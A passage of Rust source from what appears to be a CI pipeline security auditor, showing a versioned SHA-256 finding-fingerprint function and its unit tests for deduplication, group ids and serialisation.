679        .unwrap_or_else(|| category_rule_id(&finding.category))
680}
681
682/// Compute a stable cross-run fingerprint for a finding.
683///
684/// The fingerprint identifies "the same logical issue" across re-runs and
685/// across non-cosmetic edits to the surrounding pipeline. Two runs against
686/// the same input file produce the same fingerprint; a fix to the
687/// underlying issue makes the fingerprint disappear; a tweak to the
688/// finding's user-facing message does NOT change the fingerprint.
689///
690/// **Algorithm version `v2`** (replaces v1 from v0.9.1).
691///
692/// v1 collapsed every per-hop finding against the same root Secret/Identity
693/// onto a single fingerprint. That hides genuinely distinct issues — two
694/// untrusted steps reaching the same secret are two separate
695/// remediation-distinct findings, not one. v2 makes every component of the
696/// finding contribute to the hash so unrelated findings cannot alias.
697///
698/// **Inputs (sensitive to):**
699///   * Rule id — either a custom rule id parsed from a `[id] …` message
700///     prefix, or the snake_case form of `finding.category`
701///   * Source file path (`graph.source.file`) — verbatim, never normalised
702///     to a basename, so two pipelines named the same file in different
703///     directories never collide
704///   * Finding category (snake_case)
705///   * Root-authority node name — Secret/Identity name when one is
706///     involved, empty string otherwise. Surfaces the credential identity
707///     in the SIEM context column without being the only differentiator.
708///   * Ordered involved-node names — every node in `nodes_involved`,
709///     joined in original order (preserves caller intent so per-hop
710///     findings against the same secret produce distinct fingerprints).
711///
712/// **Inputs (insensitive to):**
713///   * Wall-clock time
714///   * The finding's `message` text — operators tweak phrasing without
715///     wanting suppressions to break
716///   * `taudit` version string
717///   * Environment / host / cwd
718///   * Pipeline file content hash — only the path matters
719///
720/// Stability guarantee: the v2 algorithm is stable for the v0.10+ line.
721/// Pre-v0.10 (v1 algorithm) suppressions DO NOT carry forward — a one-time
722/// re-baselining is required when upgrading. CHANGELOG and
723/// `docs/finding-fingerprint.md` flag the break explicitly.
724///
725/// Output: SHA-256 of the canonical input string, truncated to the first
726/// 16 hex characters (64 bits — collision-resistant enough for finding
727/// dedup, short enough to be human-glanceable in a SIEM table).
728pub fn compute_fingerprint(finding: &Finding, graph: &AuthorityGraph) -> String {
729    let rule_id = extract_custom_rule_id(&finding.message)
730        .map(str::to_string)
731        .unwrap_or_else(|| category_rule_id(&finding.category));
732
733    let category = category_rule_id(&finding.category);
734    let file = graph.source.file.as_str();
735
736    // Root authority name (if any) — always emitted as its own component,
737    // empty string when no Secret/Identity is involved. Distinct field so
738    // a finding whose root_authority differs from a sibling's is
739    // recognisably different even when the involved-node list happens to
740    // overlap.
741    let root_authority: String = finding
742        .nodes_involved
743        .iter()
744        .filter_map(|id| graph.node(*id))
745        .find(|n| matches!(n.kind, NodeKind::Secret | NodeKind::Identity))
746        .map(|n| n.name.clone())
747        .unwrap_or_default();
748
749    // Ordered involved-node names. Order is preserved (NOT sorted) — for
750    // authority_propagation findings the convention is `[source, sink]`,
751    // so two findings hitting the same secret but reaching different
752    // untrusted steps produce different fingerprints (the v1 collision
753    // class). Empty string when no nodes are involved.
754    let nodes_ordered: String = finding
755        .nodes_involved
756        .iter()
757        .filter_map(|id| graph.node(*id))
758        .map(|n| n.name.as_str())
759        .collect::<Vec<_>>()
760        .join(",");
761
762    // Canonical encoding: every component prefixed with a tag and joined
763    // by `\x1f` (ASCII unit separator) so component boundaries cannot
764    // alias across inputs. Algorithm version baked into the prefix so a
765    // future change to the contract is detectable from the canonical
766    // string alone.
767    let canonical = format!(
768        "v2\x1frule={rule_id}\x1ffile={file}\x1fcategory={category}\x1froot={root_authority}\x1fnodes={nodes_ordered}"
769    );
770
771    let digest = Sha256::digest(canonical.as_bytes());
772    let mut out = String::with_capacity(16);
773    for byte in &digest[..8] {
774        use std::fmt::Write;
775        // 8 bytes -> 16 hex chars
776        let _ = write!(&mut out, "{byte:02x}");
777    }
778    out
779}
780
781#[cfg(test)]
782mod fingerprint_tests {
783    use super::*;
784    use crate::graph::{AuthorityGraph, NodeKind, PipelineSource, TrustZone};
785
786    fn source(file: &str) -> PipelineSource {
787        PipelineSource {
788            file: file.to_string(),
789            repo: None,
790            git_ref: None,
791            commit_sha: None,
792        }
793    }
794
795    fn make_finding(category: FindingCategory, msg: &str, nodes: Vec<NodeId>) -> Finding {
796        Finding {
797            severity: Severity::High,
798            category,
799            path: None,
800            nodes_involved: nodes,
801            message: msg.to_string(),
802            recommendation: Recommendation::Manual {
803                action: "fix it".to_string(),
804            },
805            source: FindingSource::BuiltIn,
806            extras: FindingExtras::default(),
807        }
808    }
809
810    #[test]
811    fn fingerprint_is_stable_across_repeat_calls() {
812        let mut graph = AuthorityGraph::new(source(".github/workflows/ci.yml"));
813        let s = graph.add_node(NodeKind::Secret, "AWS_KEY", TrustZone::FirstParty);
814        let f = make_finding(
815            FindingCategory::AuthorityPropagation,
816            "AWS_KEY reaches third party",
817            vec![s],
818        );
819        let a = compute_fingerprint(&f, &graph);
820        let b = compute_fingerprint(&f, &graph);
821        assert_eq!(a, b, "same finding must hash identically across calls");
822        assert_eq!(a.len(), 16, "fingerprint is 16 hex chars");
823        assert!(a.chars().all(|c| c.is_ascii_hexdigit()));
824    }
825
826    #[test]
827    fn different_files_produce_different_fingerprints() {
828        let mut g_a = AuthorityGraph::new(source("workflows/a.yml"));
829        let mut g_b = AuthorityGraph::new(source("workflows/b.yml"));
830        let s_a = g_a.add_node(NodeKind::Secret, "TOKEN", TrustZone::FirstParty);
831        let s_b = g_b.add_node(NodeKind::Secret, "TOKEN", TrustZone::FirstParty);
832        let f_a = make_finding(FindingCategory::UnpinnedAction, "msg", vec![s_a]);
833        let f_b = make_finding(FindingCategory::UnpinnedAction, "msg", vec![s_b]);
834        assert_ne!(
835            compute_fingerprint(&f_a, &g_a),
836            compute_fingerprint(&f_b, &g_b)
837        );
838    }
839
840    #[test]
841    fn different_rules_produce_different_fingerprints() {
842        let mut graph = AuthorityGraph::new(source(".github/workflows/ci.yml"));
843        let s = graph.add_node(NodeKind::Secret, "AWS_KEY", TrustZone::FirstParty);
844        let f1 = make_finding(FindingCategory::AuthorityPropagation, "msg", vec![s]);
845        let f2 = make_finding(FindingCategory::UntrustedWithAuthority, "msg", vec![s]);
846        assert_ne!(
847            compute_fingerprint(&f1, &graph),
848            compute_fingerprint(&f2, &graph)
849        );
850    }
851
852    #[test]
853    fn message_changes_do_not_affect_fingerprint() {
854        // The whole point of cross-run dedup: an operator can re-word
855        // the message text without breaking SIEM suppressions.
856        let mut graph = AuthorityGraph::new(source(".github/workflows/ci.yml"));
857        let s = graph.add_node(NodeKind::Secret, "AWS_KEY", TrustZone::FirstParty);
858        let f1 = make_finding(
859            FindingCategory::AuthorityPropagation,
860            "old phrasing of the message",
861            vec![s],
862        );
863        let f2 = make_finding(
864            FindingCategory::AuthorityPropagation,
865            "completely different new phrasing",
866            vec![s],
867        );
868        assert_eq!(
869            compute_fingerprint(&f1, &graph),
870            compute_fingerprint(&f2, &graph)
871        );
872    }
873
874    #[test]
875    fn per_hop_findings_against_same_authority_are_distinct() {
876        // v2 contract: a single secret reaching N distinct untrusted steps
877        // produces N distinct fingerprints. Each (secret, step) pair is its
878        // own remediation-distinct finding — collapsing them (the v1
879        // behaviour) hid genuinely different exposure surfaces. SIEMs that
880        // want a per-secret rollup can group on root_authority client-side.
881        let mut graph = AuthorityGraph::new(source(".github/workflows/ci.yml"));
882        let secret = graph.add_node(NodeKind::Secret, "DEPLOY_TOKEN", TrustZone::FirstParty);
883        let step_a = graph.add_node(NodeKind::Step, "deploy[0]", TrustZone::Untrusted);
884        let step_b = graph.add_node(NodeKind::Step, "deploy[1]", TrustZone::Untrusted);
885
886        let f_a = make_finding(
887            FindingCategory::AuthorityPropagation,
888            "DEPLOY_TOKEN reaches deploy[0]",
889            vec![secret, step_a],
890        );
891        let f_b = make_finding(
892            FindingCategory::AuthorityPropagation,
893            "DEPLOY_TOKEN reaches deploy[1]",
894            vec![secret, step_b],
895        );
896        assert_ne!(
897            compute_fingerprint(&f_a, &graph),
898            compute_fingerprint(&f_b, &graph),
899            "per-hop findings against one secret must produce distinct \
900             fingerprints — sink identity is part of the issue"
901        );
902    }
903
904    #[test]
905    fn same_secret_same_sink_remains_stable_across_calls() {
906        // Re-running the SAME finding (same secret, same sink, same file)
907        // must still produce the same fingerprint — that is the entire
908        // point of cross-run dedup. The v2 change adds inputs but does not
909        // introduce non-determinism.
910        let mut graph = AuthorityGraph::new(source(".github/workflows/ci.yml"));
911        let secret = graph.add_node(NodeKind::Secret, "DEPLOY_TOKEN", TrustZone::FirstParty);
912        let step = graph.add_node(NodeKind::Step, "deploy[0]", TrustZone::Untrusted);
913        let f = make_finding(
914            FindingCategory::AuthorityPropagation,
915            "msg",
916            vec![secret, step],
917        );
918        assert_eq!(
919            compute_fingerprint(&f, &graph),
920            compute_fingerprint(&f, &graph)
921        );
922    }
923
924    #[test]
925    fn r2_attack2_two_files_same_secret_name_distinct_fingerprints() {
926        // R2 attack #2 reproducer: two genuinely different findings in two
927        // different pipeline files that share a secret NAME must produce
928        // different fingerprints. The earlier (pre-v0.9.1) algorithm could
929        // collide here; the v2 algorithm explicitly includes file path so
930        // the names cannot alias across files.
931        let mut g_a = AuthorityGraph::new(source("workflows/a.yml"));
932        let mut g_b = AuthorityGraph::new(source("workflows/b.yml"));
933        let s_a = g_a.add_node(NodeKind::Secret, "MY_SECRET", TrustZone::FirstParty);
934        let sink_a = g_a.add_node(NodeKind::Step, "evil/action", TrustZone::Untrusted);
935        let s_b = g_b.add_node(NodeKind::Secret, "MY_SECRET", TrustZone::FirstParty);
936        let sink_b = g_b.add_node(
937            NodeKind::Step,
938            "different-evil/action",
939            TrustZone::Untrusted,
940        );
941
942        let f_a = make_finding(
943            FindingCategory::AuthorityPropagation,
944            "MY_SECRET reaches evil/action",
945            vec![s_a, sink_a],
946        );
947        let f_b = make_finding(
948            FindingCategory::AuthorityPropagation,
949            "MY_SECRET reaches different-evil/action",
950            vec![s_b, sink_b],
951        );
952        assert_ne!(
953            compute_fingerprint(&f_a, &g_a),
954            compute_fingerprint(&f_b, &g_b),
955            "two genuinely different findings must not share a fingerprint \
956             just because the secret name overlaps"
957        );
958    }
959
960    #[test]
961    fn root_authority_segment_is_always_present_even_when_empty() {
962        // Findings without any Secret/Identity (e.g. floating_image) MUST
963        // still produce a stable fingerprint. The empty-root case is its
964        // own equivalence class — two such findings with the same node
965        // list collapse to the same fingerprint; differing node lists
966        // produce different fingerprints.
967        let mut g = AuthorityGraph::new(source(".github/workflows/ci.yml"));
968        let img_a = g.add_node(NodeKind::Image, "alpine:latest", TrustZone::ThirdParty);
969        let img_b = g.add_node(NodeKind::Image, "ubuntu:22.04", TrustZone::ThirdParty);
970        let f_a = make_finding(FindingCategory::FloatingImage, "msg-a", vec![img_a]);
971        let f_b = make_finding(FindingCategory::FloatingImage, "msg-b", vec![img_b]);
972        let fp_a = compute_fingerprint(&f_a, &g);
973        let fp_b = compute_fingerprint(&f_b, &g);
974        assert_ne!(
975            fp_a, fp_b,
976            "two distinct floating-image findings must not collide"
977        );
978        assert_eq!(fp_a.len(), 16);
979        assert_eq!(fp_b.len(), 16);
980    }
981
982    #[test]
983    fn node_order_is_significant() {
984        // The fingerprint preserves caller order in nodes_involved. A
985        // finding emitted as [secret, step] is semantically different from
986        // [step, secret] (source vs sink role) and produces a different
987        // fingerprint. Rules must therefore stay consistent in the order
988        // they push nodes — every built-in does today.
989        let mut g = AuthorityGraph::new(source(".github/workflows/ci.yml"));
990        let s = g.add_node(NodeKind::Secret, "K", TrustZone::FirstParty);
991        let step = g.add_node(NodeKind::Step, "use", TrustZone::Untrusted);
992        let forward = make_finding(FindingCategory::AuthorityPropagation, "x", vec![s, step]);
993        let reverse = make_finding(FindingCategory::AuthorityPropagation, "x", vec![step, s]);
994        assert_ne!(
995            compute_fingerprint(&forward, &g),
996            compute_fingerprint(&reverse, &g),
997            "node order must influence the fingerprint so role swap is detectable"
998        );
999    }
1000
1001    #[test]
1002    fn custom_rule_id_in_message_is_used() {
1003        // Custom rules carry id in `[id] message` prefix; fingerprint
1004        // must key on the custom id, not the category fallback.
1005        let mut graph = AuthorityGraph::new(source(".github/workflows/ci.yml"));
1006        let s = graph.add_node(NodeKind::Secret, "X", TrustZone::FirstParty);
1007        let f_custom = make_finding(
1008            FindingCategory::UnpinnedAction,
1009            "[my_custom_rule] something happened",
1010            vec![s],
1011        );
1012        let f_plain = make_finding(FindingCategory::UnpinnedAction, "no prefix here", vec![s]);
1013        assert_ne!(
1014            compute_fingerprint(&f_custom, &graph),
1015            compute_fingerprint(&f_plain, &graph),
1016            "custom rule id must distinguish from category fallback"
1017        );
1018    }
1019
1020    #[test]
1021    fn finding_group_id_is_deterministic_uuid_v5() {
1022        // Same fingerprint -> same group id, byte-identical.
1023        let g1 = compute_finding_group_id("5edb30f4db3b5fa3");
1024        let g2 = compute_finding_group_id("5edb30f4db3b5fa3");
1025        assert_eq!(g1, g2);
1026        // UUID v5 shape: 8-4-4-4-12 hex chars with version=5 nibble.
1027        assert_eq!(g1.len(), 36);
1028        // Position 14 is the version nibble — must be '5' for v5.
1029        assert_eq!(
1030            g1.chars().nth(14),
1031            Some('5'),
1032            "expected v5 marker, got {g1}"
1033        );
1034        // Position 19 is the variant nibble — must be one of 8/9/a/b.
1035        let variant = g1.chars().nth(19).unwrap();
1036        assert!(
1037            matches!(variant, '8' | '9' | 'a' | 'b'),
1038            "expected RFC 4122 variant, got {variant}"
1039        );
1040        // Different fingerprint -> different group id.
1041        assert_ne!(g1, compute_finding_group_id("a3c8d9e1f2b4c5d6"));
1042    }
1043
1044    #[test]
1045    fn with_time_to_fix_attaches_effort() {
1046        let mut graph = AuthorityGraph::new(source(".github/workflows/ci.yml"));
1047        let s = graph.add_node(NodeKind::Secret, "X", TrustZone::FirstParty);
1048        let f = make_finding(FindingCategory::UnpinnedAction, "msg", vec![s])
1049            .with_time_to_fix(FixEffort::Trivial);
1050        assert_eq!(f.extras.time_to_fix, Some(FixEffort::Trivial));
1051    }
1052
1053    #[test]
1054    fn with_compensating_control_downgrades_and_records_original() {
1055        let mut graph = AuthorityGraph::new(source(".github/workflows/ci.yml"));
1056        let s = graph.add_node(NodeKind::Secret, "X", TrustZone::FirstParty);
1057        let f = make_finding(FindingCategory::TriggerContextMismatch, "msg", vec![s])
1058            .with_compensating_control("fork check present");
1059        // Default High in make_finding -> downgraded to Medium.
1060        assert_eq!(f.severity, Severity::Medium);
1061        assert_eq!(f.extras.original_severity, Some(Severity::High));
1062        assert_eq!(f.extras.compensating_controls.len(), 1);
1063    }
1064
1065    #[test]
1066    fn empty_node_list_still_produces_fingerprint() {
1067        // Categories like authority_cycle, floating_image, unpinned_action
1068        // may not carry an authority node — fingerprint must still work.
1069        let graph = AuthorityGraph::new(source(".github/workflows/ci.yml"));
1070        let f = make_finding(FindingCategory::UnpinnedAction, "no nodes here", vec![]);
1071        let fp = compute_fingerprint(&f, &graph);
1072        assert_eq!(fp.len(), 16);
1073        assert!(fp.chars().all(|c| c.is_ascii_hexdigit()));
1074    }
1075}
1076
1077#[cfg(test)]
1078mod source_tests {
1079    use super::*;
1080
1081    #[test]
1082    fn built_in_serializes_as_string() {
1083        let s = FindingSource::BuiltIn;
1084        let v = serde_json::to_value(&s).unwrap();
1085        assert_eq!(v, serde_json::json!("built-in"));
1086    }
1087
1088    #[test]
1089    fn custom_serializes_with_path_payload() {
1090        let s = FindingSource::Custom {
1091            source_file: PathBuf::from("/policies/no_prod_pat.yml"),
1092        };
1093        let v = serde_json::to_value(&s).unwrap();
1094        assert_eq!(
1095            v,
1096            serde_json::json!({"custom": {"source_file": "/policies/no_prod_pat.yml"}})
1097        );
1098    }
1099
1100    #[test]
1101    fn finding_round_trip_preserves_built_in_source() {
1102        let f = Finding {
1103            severity: Severity::High,
1104            category: FindingCategory::AuthorityPropagation,
1105            path: None,
1106            nodes_involved: vec![],
1107            message: "x".into(),
1108            recommendation: Recommendation::Manual {
1109                action: "fix".into(),
1110            },
1111            source: FindingSource::BuiltIn,
1112            extras: FindingExtras::default(),
1113        };
1114        let s = serde_json::to_string(&f).unwrap();
1115        // Encoded as the literal `"source":"built-in"` — operators eyeballing
1116        // raw JSON immediately see "this is a shipped rule".
1117        assert!(
1118            s.contains("\"source\":\"built-in\""),
1119            "built-in source must serialise as \"built-in\": {s}"
1120        );
1121        let f2: Finding = serde_json::from_str(&s).unwrap();
1122        assert_eq!(f2.source, FindingSource::BuiltIn);
1123    }
1124
1125    #[test]
1126    fn finding_round_trip_preserves_custom_source_with_path() {
1127        let path = PathBuf::from("/work/invariants/no_prod_pat.yml");
1128        let f = Finding {
1129            severity: Severity::Critical,
1130            category: FindingCategory::AuthorityPropagation,
1131            path: None,
1132            nodes_involved: vec![],
1133            message: "[no_prod_pat] hit".into(),
1134            recommendation: Recommendation::Manual {
1135                action: "fix".into(),
1136            },
1137            source: FindingSource::Custom {
1138                source_file: path.clone(),
1139            },
1140            extras: FindingExtras::default(),
1141        };
1142        let s = serde_json::to_string(&f).unwrap();
1143        assert!(
1144            s.contains("\"custom\""),
1145            "custom source must serialise with `custom` key: {s}"
1146        );
1147        assert!(
1148            s.contains("/work/invariants/no_prod_pat.yml"),
1149            "custom source must include the loader path: {s}"
1150        );
1151        let f2: Finding = serde_json::from_str(&s).unwrap();
1152        assert_eq!(
1153            f2.source,
1154            FindingSource::Custom { source_file: path },
1155            "round-trip must preserve custom source path"
1156        );
1157    }
1158
1159    #[test]
1160    fn missing_source_field_deserializes_as_built_in() {
1161        // Backward-compat: pre-provenance JSON omits the field entirely; the
1162        // serde default makes it `BuiltIn`. Without this, every old
1163        // suppression DB would fail to parse on upgrade.
1164        let json = r#"{
1165            "severity": "high",
1166            "category": "authority_propagation",
1167            "nodes_involved": [],
1168            "message": "old-format finding",
1169            "recommendation": {"type": "manual", "action": "review"}
1170        }"#;
1171        let f: Finding = serde_json::from_str(json).expect("legacy JSON must parse");
1172        assert_eq!(f.source, FindingSource::BuiltIn);
1173    }
1174}